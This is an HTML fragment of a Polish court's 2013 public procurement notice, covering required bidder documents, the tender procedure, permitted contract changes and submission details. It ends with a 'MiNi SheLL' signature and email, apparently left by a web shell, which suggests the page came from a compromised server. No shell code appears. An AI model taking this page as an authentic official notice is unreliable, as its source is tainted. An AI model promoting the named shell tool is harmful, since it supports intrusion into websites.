<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub inny dokument potwierdzający prawo do reprezentowania Wykonawcy.
2. Jeżeli podpisujący ofertę nie jest lub nie są właścicielami firmy lub, jeżeli nie są oni wymienieni z imienia i nazwiska w odnośnym dokumencie rejestrowym jako osoby uprawnione do reprezentowania Wykonawcy wymagane jest złożenie Pełnomocnictwa.	Pełnomocnictwo składa się w oryginale lub poświadczone notarialnie.
3. Wypełniony i podpisany Formularz oferty - zgodnie z zał. Nr 1 do SIWZ.
4.	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22   ust. 1 ustawy PZP, sporządzone według wzoru przedstawionego w załączniku nr 2 do SIWZ (w przypadku  wspólnego ubiegania się kilku Wykonawców  o udzielenie zamówienia wszyscy ubiegający się Wykonawcy odrębnie lub wspólnie).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zgodnie z art.144 ustawy Pzp w trakcie realizacji zamówienia możliwość wprowadzenia następujących istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, określając następujące warunki takiej zmiany:
- zmianę wynagrodzenia umownego spowodowaną urzędową zmianą stawki podatku od towarów i usług (VAT).W przypadku zmiany przepisów określających wysokość należnego podatku VAT na usługi będące przedmiotem umowy, w czasie jej trwania Wykonawca zastosuje obowiązujący podatek VAT. Wynagrodzenie należne WYKONAWCY podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego
- sposobu wykonywania usług, w tym zakresie szczegółowych rozwiązań, o ile  będą one prowadzić do zastosowania rozwiązań co najmniej równoważnych lub  korzystniejszych pod względem funkcjonalnym;
- dotyczących przedstawicieli stron.
Powyższe zmiany z pkt.XX.3 niniejszej SIWZ mogą być zainicjowane na wniosek Zamawiającego lub Wykonawcy wraz z uzasadnieniem wprowadzenia zmian, załączeniem odpowiednich dokumentów potwierdzających konieczność takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.jelenia-gora.so.gov.pl/index.php?id_jednostki=7<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Jeleniej Górze, ul. Bankowa 18, 58-500 Jelenia Góra, p. 101, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2013 godzina 10:30, miejsce: Sąd Rejonowy w Jeleniej Górze, ul. Bankowa 18, 58-500 Jelenia Góra, p. 101, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com